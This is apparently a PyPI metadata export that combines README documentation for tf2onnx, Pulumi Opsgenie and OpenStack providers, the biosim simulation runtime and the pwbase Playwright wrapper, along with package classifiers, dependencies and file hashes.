        runtime can still open the model. Type is a dictionary `{op name: domain}`.
    target: list of workarounds applied to help certain platforms
    custom_op_handlers: dictionary of custom op handlers
    custom_rewriter: list of custom graph rewriters
    extra_opset: list of extra opsets, for example the opsets used by custom ops
    shape_override: dict with inputs that override the shapes given by tensorflow
    inputs_as_nchw: transpose inputs in list from nhwc to nchw
    outputs_as_nchw: transpose outputs in list from nhwc to nchw
    large_model: use the ONNX external tensor storage format
    output_path: save model to output_path

Returns:
    An ONNX model_proto and an external_tensor_storage dict.
```
### from_graph_def
```
import tf2onnx
model_proto, external_tensor_storage = tf2onnx.convert.from_graph_def(graph_def,
    name=None, input_names=None, output_names=None, opset=None,
    custom_ops=None, custom_op_handlers=None, custom_rewriter=None,
    inputs_as_nchw=None, outputs_as_nchw=None, extra_opset=None,
    shape_override=None, target=None, large_model=False,
    output_path=None)

Args:
    graph_def: the graph_def we want to convert
    input_names: list of input names
    output_names: list of output names
    name: A name for the graph
    opset: the opset to be used for the ONNX model, default is the latest
    target: list of workarounds applied to help certain platforms
    custom_op_handlers: dictionary of custom op handlers
    custom_rewriter: list of custom graph rewriters
    extra_opset: list of extra opsets, for example the opsets used by custom ops
    shape_override: dict with inputs that override the shapes given by tensorflow
    inputs_as_nchw: transpose inputs in list from nhwc to nchw
    outputs_as_nchw: transpose outputs in list from nhwc to nchw
    large_model: use the ONNX external tensor storage format
    output_path: save model to output_path

Returns:
    An ONNX model_proto and an external_tensor_storage dict.
```
### from_tflite
```
import tf2onnx
model_proto, external_tensor_storage = tf2onnx.convert.from_tflite(tflite_path,
    input_names=None, output_names=None, opset=None, custom_ops=None, custom_op_handlers=None,
    custom_rewriter=None, inputs_as_nchw=None, outputs_as_nchw=None, extra_opset=None,
    shape_override=None, target=None, large_model=False, output_path=None)

Args:
    tflite_path: the tflite model file full path
    input_names: list of input names
    output_names: list of output names
    opset: the opset to be used for the ONNX model, default is the latest
    custom_ops: if a model contains ops not recognized by onnx runtime,
        you can tag these ops with a custom op domain so that the
        runtime can still open the model. Type is a dictionary `{op name: domain}`.
    custom_op_handlers: dictionary of custom op handlers
    custom_rewriter: list of custom graph rewriters
    inputs_as_nchw: transpose inputs in list from nhwc to nchw
    outputs_as_nchw: transpose outputs in list from nhwc to nchw
    extra_opset: list of extra opsets, for example the opsets used by custom ops
    shape_override: dict with inputs that override the shapes given by tensorflow
    target: list of workarounds applied to help certain platforms
    large_model: use the ONNX external tensor storage format
    output_path: save model to output_path

Returns:
    An ONNX model_proto and an external_tensor_storage dict.
```
### Creating custom op mappings from python
For complex custom ops that require graph rewrites or input/attribute rewrites, using the Python interface to insert a custom op is the easiest approach.
A dictionary of name->custom_op_handler can be passed to `tf2onnx.tfonnx.process_tf_graph`. If the op name is found in the graph, the handler has access to all internal structures and can rewrite the graph as needed. For example, [examples/custom_op_via_python.py](examples/custom_op_via_python.py):
```
import tensorflow as tf
import tf2onnx
from onnx import helper

_TENSORFLOW_DOMAIN = "ai.onnx.converters.tensorflow"


def print_handler(ctx, node, name, args):
    # replace tf.Print() with Identity
    #   T output = Print(T input, data, @list(type) U, @string message, @int first_n, @int summarize)
    # becomes:
    #   T output = Identity(T input)
    node.domain = _TENSORFLOW_DOMAIN
    del node.input[1:]
    return node


with tf.Session() as sess:
    x = tf.placeholder(tf.float32, [2, 3], name="input")
    x_ = tf.add(x, x)
    x_ = tf.Print(x_, [x_], "hello")
    _ = tf.identity(x_, name="output")
    onnx_graph = tf2onnx.tfonnx.process_tf_graph(sess.graph,
        custom_op_handlers={"Print": (print_handler, ["Identity", "mode"])},
        extra_opset=[helper.make_opsetid(_TENSORFLOW_DOMAIN, 1)],
        input_names=["input:0"],
        output_names=["output:0"])
    model_proto = onnx_graph.make_model("test")
    with open("/tmp/model.onnx", "wb") as f:
        f.write(model_proto.SerializeToString())
```
## How tf2onnx works
The converter needs to take care of a few things:
1. Convert the protobuf format. Since the formats are similar, this step is straightforward.
2. TensorFlow types need to be mapped to their ONNX equivalents.
3. For many ops TensorFlow passes parameters like shapes as inputs where ONNX wants to see them as attributes. Since we use a frozen graph, the converter can fetch such an input as a constant, convert it to an attribute and remove the original input.
4. TensorFlow in many cases composes ops out of multiple simpler ops. The converter needs to identify such subgraphs, slice them out and replace them with the ONNX equivalent. This can become fairly complex, so we use a graph matching library for it. A good example of this is the TensorFlow transpose op.
5. TensorFlow's default data format is NHWC while ONNX requires NCHW. The converter inserts transpose ops to deal with this.
6. Some ops, like relu6, are not supported in ONNX but can be composed out of other ONNX ops.
7. ONNX backends are new and their implementations are not complete yet. For some ops the converter generates ops that work around issues in existing backends.
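For item 5, the inserted transpose ops use fixed permutations; a minimal sketch (the names below are illustrative, not converter internals):

```python
NHWC_TO_NCHW = [0, 3, 1, 2]  # perm attribute for a Transpose inserted on inputs
NCHW_TO_NHWC = [0, 2, 3, 1]  # inverse permutation, used on outputs

def permute_shape(shape, perm):
    """Apply a transpose permutation to a shape."""
    return [shape[p] for p in perm]

nhwc = [1, 224, 224, 3]  # batch, height, width, channels
print(permute_shape(nhwc, NHWC_TO_NCHW))  # [1, 3, 224, 224]
```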
### Step 1 - start with a frozen graph
tf2onnx starts with a frozen graph. This is because of item 3 above.
### Step 2 - 1:1 conversion of the protobuf from tensorflow to onnx
tf2onnx first does a simple conversion from the TensorFlow protobuf format to the ONNX protobuf format without looking at individual ops.
We do this so we can use the ONNX graph as internal representation and write helper functions around it.
The code that does the conversion is in tensorflow_to_onnx(). tensorflow_to_onnx() will return the ONNX graph and a dictionary with shape information from TensorFlow. The shape information is helpful in some cases when processing individual ops.
The ONNX graph is wrapped in a Graph object and nodes in the graph are wrapped in a Node object to allow easier graph manipulations on the graph. All code that deals with nodes and graphs is in graph.py.
### Step 3 - rewrite subgraphs
In the next step we apply graph matching code on the graph to rewrite subgraphs for ops like transpose and lstm. For an example, look at rewrite_transpose().
### Step 4 - process individual ops
In the fourth step we look at individual ops that need attention. The dictionary _OPS_MAPPING will map tensorflow op types to a method that is used to process the op. The simplest case is direct_op() where the op can be taken as is. Whenever possible we try to group ops into common processing, for example all ops that require dealing with broadcasting are mapped to broadcast_op(). For an op that composes the tensorflow op from multiple onnx ops, see relu6_op().
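A toy version of this dispatch can illustrate the idea (a sketch only; the real `_OPS_MAPPING` handlers operate on graph nodes and have different signatures):

```python
def direct_op(node):
    # the op maps 1:1 onto ONNX, take it as-is
    return [node]

def relu6_op(node):
    # relu6 does not exist in ONNX; expand into Relu followed by Min(., 6)
    return [{"type": "Relu"}, {"type": "Min", "const": 6.0}]

_OPS_MAPPING = {"Identity": direct_op, "Relu6": relu6_op}

def map_node(node):
    handler = _OPS_MAPPING.get(node["type"])
    if handler is None:
        raise NotImplementedError("no mapping for " + node["type"])
    return handler(node)

print([n["type"] for n in map_node({"type": "Relu6"})])  # ['Relu', 'Min']
```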
### Step 5 - optimize the functional ONNX graph
We then try to optimize the functional ONNX graph: for example we remove ops that are not needed,
remove transposes as much as possible, de-duplicate constants and fuse ops whenever possible.
### Step 6 - final processing
Once all ops are converted and optimized, we do a topological sort, since ONNX requires it. process_tf_graph() is the method that takes care of all the above steps.
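The topological sort itself is standard; a minimal Kahn's-algorithm sketch (not the converter's actual code):

```python
from collections import deque

def topological_sort(nodes, edges):
    """Order nodes so that every edge (a, b) has a before b; raise on cycles."""
    indegree = {n: 0 for n in nodes}
    for a, b in edges:
        indegree[b] += 1
    ready = deque(n for n in nodes if indegree[n] == 0)
    order = []
    while ready:
        n = ready.popleft()
        order.append(n)
        for a, b in edges:
            if a == n:
                indegree[b] -= 1
                if indegree[b] == 0:
                    ready.append(b)
    if len(order) != len(nodes):
        raise ValueError("graph has a cycle")
    return order

print(topological_sort(["mul", "input", "add"], [("input", "add"), ("add", "mul")]))
# ['input', 'add', 'mul']
```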
## Extending tf2onnx
If you would like to contribute new conversions to tf2onnx, the process is roughly:
1. See if the op fits into one of the existing mappings. If so, adding it to _OPS_MAPPING is all that is needed.
2. If the new op needs extra processing, start a new mapping function.
3. If the tensorflow op is composed of multiple ops, consider using a graph re-write. While this might be a little harder initially, it works better for complex patterns.
4. Add a unit test in tests/test_backend.py. The unit tests mostly create the tensorflow graph, run it and capture the output, then convert it to onnx, run it against an onnx backend and compare the tensorflow and onnx results.
5. If there are pre-trained models that use the new op, consider adding those to tests/run_pretrained_models.py.
## License
[Apache License v2.0](LICENSE)
| text/markdown | null | ONNX <onnx-technical-discuss@lists.lfaidata.foundation> | null | null | null | null | [
"Development Status :: 5 - Production/Stable",
"Intended Audience :: Developers",
"Intended Audience :: Education",
"Intended Audience :: Science/Research",
"Topic :: Scientific/Engineering",
"Topic :: Scientific/Engineering :: Mathematics",
"Topic :: Scientific/Engineering :: Artificial Intelligence",
"Topic :: Software Development",
"Topic :: Software Development :: Libraries",
"Topic :: Software Development :: Libraries :: Python Modules",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.10",
"Programming Language :: Python :: 3.11",
"Programming Language :: Python :: 3.12"
] | [] | null | null | >=3.10 | [] | [] | [] | [
"numpy>=1.23.5",
"onnx>=1.14.0",
"requests",
"flatbuffers>=1.12",
"protobuf>=3.20",
"graphviz; extra == \"test\"",
"parameterized; extra == \"test\"",
"pytest; extra == \"test\"",
"pytest-cov; extra == \"test\"",
"pyyaml; extra == \"test\""
] | [] | [] | [] | [
"Homepage, https://github.com/onnx/tensorflow-onnx"
] | twine/6.1.0 CPython/3.13.7 | 2026-02-20T06:34:59.915717 | tf2onnx-1.17.0rc1.tar.gz | 591,264 | 09/4e/bc69ad40af0577383d108cf7efd347846750f050bb93d0fd097149f73f7c/tf2onnx-1.17.0rc1.tar.gz | source | sdist | null | false | 454444950609808cabae8f77dc545f92 | 22f01ae2305318241a8b40c79c2bcaa33724da46bc8bbebd3fb96fb80603f78b | 094ebc69ad40af0577383d108cf7efd347846750f050bb93d0fd097149f73f7c | Apache-2.0 | [
"LICENSE"
] | 602 |
2.4 | pulumi-opsgenie | 1.4.0a1771568901 | A Pulumi package for creating and managing opsgenie cloud resources. | [](https://github.com/pulumi/pulumi-opsgenie/actions)
[](https://slack.pulumi.com)
[](https://npmjs.com/package/@pulumi/opsgenie)
[](https://badge.fury.io/nu/pulumi.opsgenie)
[](https://pypi.org/project/pulumi-opsgenie)
[](https://pkg.go.dev/github.com/pulumi/pulumi-opsgenie/sdk/go)
[](https://github.com/pulumi/pulumi-opsgenie/blob/master/LICENSE)
# Opsgenie Resource Provider
The OpsGenie resource provider for Pulumi lets you manage opsgenie resources in your cloud programs. To use this package, please install the Pulumi CLI first.
## Installing
This package is available in many languages in the standard packaging formats.
### Node.js (JavaScript/TypeScript)
To use from JavaScript or TypeScript in Node.js, install using either `npm`:
$ npm install @pulumi/opsgenie
or `yarn`:
$ yarn add @pulumi/opsgenie
### Python
To use from Python, install using `pip`:
$ pip install pulumi_opsgenie
### Go
To use from Go, use `go get` to grab the latest version of the library
$ go get github.com/pulumi/pulumi-opsgenie/sdk
### .NET
To use from .NET, install using `dotnet add package`:
$ dotnet add package Pulumi.Opsgenie
## Configuration
The following configuration points are available for the `opsgenie` provider:
- `opsgenie:api_key` (Required) - the API key for `opsgenie`. Can also be provided with `OPSGENIE_API_KEY`.
- `opsgenie:api_url` (Optional) - the API url for `opsgenie`. Can also be provided with `OPSGENIE_API_URL`. Defaults to `api.opsgenie.com`.
## Reference
For detailed reference documentation, please visit [the API docs][1].
[1]: https://www.pulumi.com/docs/reference/pkg/opsgenie/
| text/markdown | null | null | null | null | Apache-2.0 | pulumi, opsgenie | [] | [] | null | null | >=3.9 | [] | [] | [] | [
"parver>=0.2.1",
"pulumi<4.0.0,>=3.165.0",
"semver>=2.8.1",
"typing-extensions<5,>=4.11; python_version < \"3.11\""
] | [] | [] | [] | [
"Homepage, https://pulumi.io",
"Repository, https://github.com/pulumi/pulumi-opsgenie"
] | twine/6.2.0 CPython/3.11.8 | 2026-02-20T06:34:48.913195 | pulumi_opsgenie-1.4.0a1771568901.tar.gz | 76,987 | f6/fc/77ecfe7a541feef08e4eeb4a2c6b04097e66be780a91a32ce93eb96ec94b/pulumi_opsgenie-1.4.0a1771568901.tar.gz | source | sdist | null | false | 001f3bb4bb0d722d36d38acc4e9f2096 | 00f2b57a44143162c167321825de27bac251ae4b7650e99781a4b1ebfc2b34e5 | f6fc77ecfe7a541feef08e4eeb4a2c6b04097e66be780a91a32ce93eb96ec94b | null | [] | 201 |
2.4 | pulumi-openstack | 5.5.0a1771568855 | A Pulumi package for creating and managing OpenStack cloud resources. | [](https://github.com/pulumi/pulumi-openstack/actions)
[](https://slack.pulumi.com)
[](https://www.npmjs.com/package/@pulumi/openstack)
[](https://pypi.org/project/pulumi-openstack)
[](https://badge.fury.io/nu/pulumi.openstack)
[](https://pkg.go.dev/github.com/pulumi/pulumi-openstack/sdk/v3/go)
[](https://github.com/pulumi/pulumi-openstack/blob/master/LICENSE)
# OpenStack Resource Provider
The OpenStack resource provider for Pulumi lets you use OpenStack resources in your cloud programs. To use
this package, please [install the Pulumi CLI first](https://pulumi.io/).
## Installing
This package is available in many languages in the standard packaging formats.
### Node.js (JavaScript/TypeScript)
To use from JavaScript or TypeScript in Node.js, install using either `npm`:
$ npm install @pulumi/openstack
or `yarn`:
$ yarn add @pulumi/openstack
### Python
To use from Python, install using `pip`:
$ pip install pulumi_openstack
### Go
To use from Go, use `go get` to grab the latest version of the library
$ go get github.com/pulumi/pulumi-openstack/sdk/v4
### .NET
To use from .NET, install using `dotnet add package`:
$ dotnet add package Pulumi.Openstack
## Configuration
The following configuration points are available:
- `openstack:authUrl` - (Optional) The Identity authentication URL. If omitted, the `OS_AUTH_URL` environment variable is used.
- `openstack:cloud` - (Optional) An entry in a `clouds.yaml` file. See the OpenStack `openstacksdk`
[documentation](https://docs.openstack.org/openstacksdk/latest/user/config/configuration.html) for more information about
`clouds.yaml` files. If omitted, the `OS_CLOUD` environment variable is used.
- `openstack:region` - (Optional) The region of the OpenStack cloud to use. If omitted, the `OS_REGION_NAME` environment
variable is used. If `OS_REGION_NAME` is not set, then no region will be used. It should be possible to omit the region
in single-region OpenStack environments, but this behavior may vary depending on the OpenStack environment being used.
- `openstack:userName` - (Optional) The Username to login with. If omitted, the `OS_USERNAME` environment variable is used.
- `openstack:userId` - (Optional) The User ID to login with. If omitted, the `OS_USER_ID` environment variable is used.
- `openstack:applicationCredentialId` - (Optional) (Identity v3 only) The ID of an application credential to authenticate with. An
`applicationCredentialSecret` has to bet set along with this parameter. Can be set via the `OS_APPLICATION_CREDENTIAL_ID`
environment variable.
- `openstack:applicationCredentialName` - (Optional) (Identity v3 only) The name of an application credential to authenticate with.
Conflicts with the `applicationCredentialId`, requires `userId`, or `userName` and `userDomainName` (or `userDomainId`) to be set.
Can be set via the `OS_APPLICATION_CREDENTIAL_NAME` environment variable.
- `openstack:applicationCredentialSecret` - (Optional) (Identity v3 only) The secret of an application credential to authenticate with.
Required by `applicationCredentialId` or `applicationCredentialName`. Can be set via the `OS_APPLICATION_CREDENTIAL_SECRET`
environment variable.
- `openstack:tenantId` - (Optional) The ID of the Tenant (Identity v2) or Project (Identity v3) to login with. If omitted, the
`OS_TENANT_ID` or `OS_PROJECT_ID` environment variables are used.
- `openstack:tenantName` - (Optional) The Name of the Tenant (Identity v2) or Project (Identity v3) to login with. If omitted,
the `OS_TENANT_NAME` or `OS_PROJECT_NAME` environment variable are used.
- `openstack:password` - (Optional) The Password to login with. If omitted, the
`OS_PASSWORD` environment variable is used.
- `openstack:token` - (Optional) A token is an expiring, temporary means of access issued via the Keystone service. By specifying
a token, you do not have to specify a username/password combination, since the token was already created by a username/password
out of band of the provider. If omitted, the `OS_TOKEN` or `OS_AUTH_TOKEN` environment variables are used.
- `openstack:userDomainName` - (Optional) The domain name where the user is located. If omitted, the `OS_USER_DOMAIN_NAME`
environment variable is checked.
- `openstack:userDomainId` - (Optional) The domain ID where the user is located. If omitted, the `OS_USER_DOMAIN_ID` environment
variable is checked.
- `openstack:projectDomainName` - (Optional) The domain name where the project is located. If omitted, the `OS_PROJECT_DOMAIN_NAME`
environment variable is checked.
- `openstack:projectDomainId` - (Optional) The domain ID where the project is located. If omitted, the `OS_PROJECT_DOMAIN_ID`
environment variable is checked.
- `openstack:domainId` - (Optional) The ID of the Domain to scope to (Identity v3). If omitted, the `OS_DOMAIN_ID` environment
variable is checked.
- `openstack:domainName` - (Optional) The Name of the Domain to scope to (Identity v3). If omitted, the `OS_DOMAIN_NAME` environment
variable is checked.
- `openstack:defaultDomain` - (Optional) The ID of the Domain to scope to if no other domain is specified (Identity v3). If omitted,
the environment variable `OS_DEFAULT_DOMAIN` is checked or a default value of `default` will be used.
- `openstack:insecure` - (Optional) Trust self-signed SSL certificates. If omitted, the `OS_INSECURE` environment variable is used.
- `openstack:cacertFile` - (Optional) Specify a custom CA certificate when communicating over SSL. You can specify either a path
to the file or the contents of the certificate. If omitted, the `OS_CACERT` environment variable is used.
- `openstack:cert` - (Optional) Specify client certificate file for SSL client authentication. You can specify either a path to
the file or the contents of the certificate. If omitted the `OS_CERT` environment variable is used.
- `openstack:key` - (Optional) Specify client private key file for SSL client authentication. You can specify either a path
to the file or the contents of the key. If omitted the `OS_KEY` environment variable is used.
- `openstack:endpointType` - (Optional) Specify which type of endpoint to use from the service catalog. It can be set using the
`OS_ENDPOINT_TYPE` environment variable. If not set, public endpoints are used.
- `openstack:endpointOverrides` - (Optional) A set of key/value pairs that can override an endpoint for a specified OpenStack service.
Setting an override requires you to specify the full and complete endpoint URL. This might also invalidate any region you have set,
too. Please use this at your own risk.
- `openstack:swauth` - (Optional) Set to `true` to authenticate against Swauth, a Swift-native authentication system. If omitted, the
`OS_SWAUTH` environment variable is used. You must also set `username` to the Swauth/Swift username such as `username:project`.
Set the `password` to the Swauth/Swift key. Finally, set `auth_url` as the location of the Swift service. Note that this
will only work when used with the OpenStack Object Storage resources.
- `openstack:useOctavia` - (Optional) If set to `true`, API requests will go to the Load Balancer service (Octavia) instead of
the Networking service (Neutron).
- `openstack:disableNoCacheHeader` - (Optional) If set to `true`, the HTTP `Cache-Control: no-cache` header will not be added by default to all API requests.
If omitted this header is added to all API requests to force HTTP caches (if any) to go upstream instead of serving cached responses.
- `openstack:delayedAuth` - (Optional) If set to `true`, OpenStack authorization will be performed when the service provider client is called.
- `openstack:allowReauth` - (Optional) If set to `true`, OpenStack authorization will be performed automatically if the initial auth token
expires. This is useful when the token TTL is low or the overall provider execution time is expected to be greater than the initial token TTL.
## Reference
For further information, please visit [the OpenStack provider docs](https://www.pulumi.com/docs/intro/cloud-providers/openstack) or for detailed reference documentation, please visit [the API docs](https://www.pulumi.com/docs/reference/pkg/openstack).
| text/markdown | null | null | null | null | Apache-2.0 | pulumi, openstack | [] | [] | null | null | >=3.9 | [] | [] | [] | [
"parver>=0.2.1",
"pulumi<4.0.0,>=3.165.0",
"semver>=2.8.1",
"typing-extensions<5,>=4.11; python_version < \"3.11\""
] | [] | [] | [] | [
"Homepage, https://pulumi.io",
"Repository, https://github.com/pulumi/pulumi-openstack"
] | twine/6.2.0 CPython/3.11.8 | 2026-02-20T06:34:08.556501 | pulumi_openstack-5.5.0a1771568855.tar.gz | 413,476 | 72/0f/dc7fd48af986efa3b1ef2d5d6dd528b3f4b747dad1a4142abea56ecd0ace/pulumi_openstack-5.5.0a1771568855.tar.gz | source | sdist | null | false | 3adc25e372beb82f3cd61c31443c7dc0 | e3620c6fe794a4ad59eece1c3892f78978dbf7ed76c00738ca3f99714dfef2ef | 720fdc7fd48af986efa3b1ef2d5d6dd528b3f4b747dad1a4142abea56ecd0ace | null | [] | 201 |
2.4 | biosim | 0.0.2 | Core simulation library for Biosimulant | # biosim
[](https://pypi.org/project/biosim)
[](https://pypi.org/project/biosim)
Composable simulation runtime + UI layer for orchestrating runnable biomodules.
---
## Executive Summary & System Goals
### Vision
Provide a small, stable composition layer for simulations: wire reusable components ("biomodules") into a `BioWorld`, run them with a single orchestration contract, and visualize/debug runs via a lightweight web UI (SimUI). Biomodules are self-contained Python packages that can wrap external simulators internally (SBML/NeuroML/CellML/etc.) without a separate adapter layer.
### Core Mission
- Compose simulations from reusable, interoperable biomodules.
- Make "run + visualize + share a config" the default workflow (local-first; hosted later).
- Keep the runtime small and predictable while letting biomodules embed their own simulator/tooling.
### Primary Users
- Developers and researchers who need composable simulation workflows and fast iteration.
- Near-term beachhead: neuroscience demos (single neuron + small E/I microcircuits) with strong visuals and reproducible configs.
---
## Installation
Preferred (pinned GitHub ref):
```console
pip install "biosim @ git+https://github.com/<org>/biosim.git@<ref>"
```
Alternative (package index):
```console
pip install biosim
```
## Publishing to PyPI
See the release guide: [`docs/releasing.md`](docs/releasing.md).
## Examples
- See `examples/` for quick-start scripts. Try:
```bash
pip install -e .
python examples/basic_usage.py
```
For advanced curated demos (neuro/ecology), wiring configs, and model-pack templates, see the companion repo:
- https://github.com/Biosimulant/models
### Quick Start: BioWorld
Minimal usage:
```python
import biosim
from biosim import BioSignal, SignalMetadata
class Counter(biosim.BioModule):
    min_dt = 0.1

    def __init__(self):
        self.value = 0

    def reset(self) -> None:
        self.value = 0

    def advance_to(self, t: float) -> None:
        self.value += 1

    def get_outputs(self):
        source = getattr(self, "_world_name", "counter")
        return {
            "count": BioSignal(
                source=source,
                name="count",
                value=self.value,
                time=0.0,
                metadata=SignalMetadata(units="1", description="tick counter"),
            )
        }
world = biosim.BioWorld()
world.add_biomodule("counter", Counter())
world.run(duration=1.0, tick_dt=0.1)
```
### Visuals from Modules
Modules may optionally expose web-native visuals via `visualize()`, returning a dict or list of dicts with keys `render` and `data`. The world can collect them without any transport layer:
```python
class MyModule(biosim.BioModule):
    min_dt = 0.1

    def advance_to(self, t: float) -> None:
        return

    def get_outputs(self):
        return {}

    def visualize(self):
        return {
            "render": "timeseries",
            "data": {"series": [{"name": "s", "points": [[0.0, 1.0]]}]},
        }
world = biosim.BioWorld()
world.add_biomodule("module", MyModule())
world.run(duration=0.1, tick_dt=0.1)
print(world.collect_visuals()) # [{"module": "module", "visuals": [...]}]
```
See `examples/visuals_demo.py` for a minimal end-to-end example.
## SimUI (Python-Declared UI)
SimUI lets you build and launch a small web UI entirely from Python (similar to Gradio's ergonomics), backed by FastAPI and a prebuilt React SPA that renders visuals from JSON. The frontend uses Server-Sent Events (SSE) for real-time updates.
- User usage (no Node/npm required):
- Install UI extras: `pip install -e '.[ui]'`
- Try the demo: `python examples/ui_demo.py` then open `http://127.0.0.1:7860/ui/`.
- From your own code:
```python
from biosim.simui import Interface, Number, Button, EventLog, VisualsPanel
world = biosim.BioWorld()
ui = Interface(
    world,
    controls=[Number("duration", 10), Number("tick_dt", 0.1), Button("Run")],
    outputs=[EventLog(), VisualsPanel()],
)
ui.launch()
```
- The UI provides endpoints under `/ui/api/...`:
  - `GET /api/spec` – UI layout (controls, outputs, modules)
  - `POST /api/run` – Start a simulation run
  - `GET /api/status` – Runner status (running/paused/error)
  - `GET /api/state` – Full state (status + last step + modules)
  - `GET /api/events` – Buffered world events (`?since_id=&limit=`)
  - `GET /api/visuals` – Collected module visuals
  - `GET /api/snapshot` – Full snapshot (status + visuals + events)
  - `GET /api/stream` – SSE endpoint for real-time event streaming
  - `POST /api/pause` – Pause running simulation
  - `POST /api/resume` – Resume paused simulation
  - `POST /api/reset` – Stop, reset, and clear buffers
- **Editor sub-API** (`/api/editor/...`): visual config editor for loading, saving, validating, and applying YAML wiring configs as node graphs. Endpoints include `modules`, `current`, `config`, `apply`, `validate`, `layout`, `to-yaml`, `from-yaml`, and `files`.
Per-run resets for clean visuals
- On each `Run`, the backend clears its event buffer and calls `reset()` on modules if they implement it.
- The frontend clears visuals/events before posting `/api/run`.
- To avoid overlapping charts across runs, add `reset()` to modules that accumulate history (e.g., time series points).
- Maintainer flow (building the frontend SPA):
- Edit the React/Vite app under `src/biosim/simui/_frontend/`.
- Build via Python: `python -m biosim.simui.build` (requires Node/npm). This writes `src/biosim/simui/static/app.js`.
- Alternatively: `bash scripts/build_simui_frontend.sh`.
- Packaging includes `src/biosim/simui/static/**`, so end users never need npm.
- CI packaging (recommended): run the frontend build before `python -m build` so wheels/sdists ship the bundled assets.
Troubleshooting:
- If you see `SimUI static bundle missing at .../static/app.js`, build the frontend with `python -m biosim.simui.build` (requires Node/npm) before launching. End users installing a release wheel won't see this.
### SimUI Design Notes
- Transport: SSE (Server-Sent Events). The SPA connects to `/api/stream` for real-time updates. Polling endpoints (`/api/status`, `/api/visuals`, `/api/events`) remain available for fallback/debugging.
- Events API: `/api/events?since_id=<int>&limit=<int>` returns `{ events, next_since_id }` where `events` are appended world events and `next_since_id` is the cursor for subsequent calls.
- VisualSpec types supported now:
- `timeseries`: `data = { "series": [{ "name": str, "points": [[x, y], ...] }, ...] }`
- `bar`: `data = { "items": [{ "label": str, "value": number }, ...] }`
- `table`: `data = { "columns": [..], "rows": [[..], ...] }` or `data = { "items": [{...}, ...] }`
- `image`: `data = { "src": str, "alt"?: str, "width"?: number, "height"?: number }`
- `scatter`: scatter plot data
- `heatmap`: matrix/heatmap data
- `graph`: placeholder renderer shows counts + JSON; richer graph lib can be added later
- `custom:<type>`: custom renderer namespace for user-defined types
- unknown types: rendered as JSON fallback
- VisualSpec may also include an optional `description` (string) for hover text or captions.
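The `since_id` cursor on `/api/events` is meant to be followed in a loop. A sketch with the HTTP call abstracted behind a `fetch` callable (so it works with any client), assuming only the `{ events, next_since_id }` envelope described above:

```python
from typing import Callable

def drain_events(fetch: Callable[[int, int], dict], limit: int = 100) -> list[dict]:
    """Pull all pending world events by following the next_since_id cursor.

    `fetch(since_id, limit)` should GET /api/events?since_id=...&limit=...
    and return the parsed JSON envelope { "events": [...], "next_since_id": int }.
    """
    events: list[dict] = []
    since_id = 0
    while True:
        page = fetch(since_id, limit)
        batch = page["events"]
        events.extend(batch)
        since_id = page["next_since_id"]
        if not batch:  # empty page means we are caught up
            return events
```

Passing the returned cursor back as `since_id` guarantees each event is delivered once, even when more events arrive between polls.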
## Terminology
Understanding the core concepts is essential for working with biosim effectively.
| Term | Description |
|------|-------------|
| **BioWorld** | Runtime container that orchestrates multi-rate biomodules, routes signals, and publishes lifecycle events. |
| **BioModule** | Pluggable unit of behavior with local state. Implements the runnable contract (`setup/reset/advance_to/...`). |
| **BioSignal** | Typed, versioned data payload exchanged between modules via named ports. |
| **WorldEvent** | Runtime events emitted by the BioWorld (`STARTED`, `TICK`, `FINISHED`, etc.). |
| **Wiring** | Module connection graph. Defined programmatically, via `WiringBuilder`, or loaded from YAML/TOML configs. |
| **VisualSpec** | JSON structure returned by `module.visualize()` with `render` type and `data` payload. |
### Event Lifecycle
Every simulation follows this sequence:
```
STARTED -> TICK (xN) -> FINISHED
```
`PAUSED`, `RESUMED`, `STOPPED`, and `ERROR` may also be emitted depending on runtime control flow.
## License
MIT. See `LICENSE.txt`.
| text/markdown | null | Demi <bjaiye1@gmail.com> | null | null | null | null | [
"Development Status :: 4 - Beta",
"Programming Language :: Python",
"Programming Language :: Python :: 3.10",
"Programming Language :: Python :: 3.11",
"Programming Language :: Python :: 3.12",
"Programming Language :: Python :: Implementation :: CPython",
"Programming Language :: Python :: Implementation :: PyPy"
] | [] | null | null | >=3.10 | [] | [] | [] | [
"numpy>=1.26",
"fastapi<1,>=0.110; extra == \"all\"",
"pytest-cov>=4; extra == \"all\"",
"pytest>=7; extra == \"all\"",
"pyyaml>=6; extra == \"all\"",
"tomli>=2; python_version < \"3.11\" and extra == \"all\"",
"uvicorn>=0.23; extra == \"all\"",
"pytest-cov>=4; extra == \"dev\"",
"pytest>=7; extra == \"dev\"",
"pyyaml>=6; extra == \"dev\"",
"tomli>=2; python_version < \"3.11\" and extra == \"dev\"",
"fastapi<1,>=0.110; extra == \"ui\"",
"uvicorn>=0.23; extra == \"ui\""
] | [] | [] | [] | [
"Documentation, https://github.com/Biosimulant/biosim#readme",
"Issues, https://github.com/Biosimulant/biosim/issues",
"Source, https://github.com/Biosimulant/biosim"
] | twine/6.1.0 CPython/3.13.7 | 2026-02-20T06:33:24.929577 | biosim-0.0.2.tar.gz | 260,489 | 50/fb/0ef7d583f9122c6945385e97bd6026acedb222836bed34e822a30a380a54/biosim-0.0.2.tar.gz | source | sdist | null | false | 011e4983bffba48f32d6dd830f68e3bb | 420203df25ccf9a2080678cf36f6dcde64860406e5016d3e726cc4148ca5e0f0 | 50fb0ef7d583f9122c6945385e97bd6026acedb222836bed34e822a30a380a54 | MIT | [
"LICENSE.txt"
] | 233 |
2.4 | pwbase | 0.1.0 | A lightweight async Playwright wrapper for Python that supports three browser launch strategies and can intercept authenticated HTTP sessions from live browser traffic. | # pwbase
A lightweight async Playwright wrapper for Python that supports three browser launch strategies and can intercept authenticated HTTP sessions from live browser traffic.
## Features
- Three browser modes: plain Playwright, stealth (bot-detection evasion), and CDP attachment
- Persistent browser state (cookies + localStorage) via `save_state` / `state_path`
- `BrowserSessionExtractor` — intercepts JSON responses and converts them into authenticated `requests.Session` objects
- Fully async, context-manager-friendly API
## Requirements
- Python 3.12+
- [uv](https://github.com/astral-sh/uv) (recommended) or pip
## Installation
```bash
uv add pwbase
# or
pip install pwbase
```
Install Playwright browsers after installing the package:
```bash
playwright install chromium
```
## Quick Start
```python
import asyncio
from pwbase import Browser, BrowserConfig, BrowserType
async def main():
async with Browser(BrowserConfig(type=BrowserType.STEALTH)) as browser:
page = await browser.get_page()
await page.goto("https://example.com")
print(await page.title())
asyncio.run(main())
```
## Browser Modes
| Mode | `BrowserType` | Description |
|---|---|---|
| Default | `DEFAULT` | Pure Playwright, no extras |
| Stealth | `STEALTH` | Applies `playwright-stealth` to reduce bot detection signals |
